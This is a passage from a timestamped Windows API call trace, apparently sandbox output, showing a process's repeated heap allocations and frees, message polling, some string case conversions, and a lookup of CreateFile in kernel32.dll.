| out: lpMsg=0x87f5c4) returned 0 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.436] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0191.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.437] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.438] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.441] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.444] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9c70 [0191.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9c70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.445] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 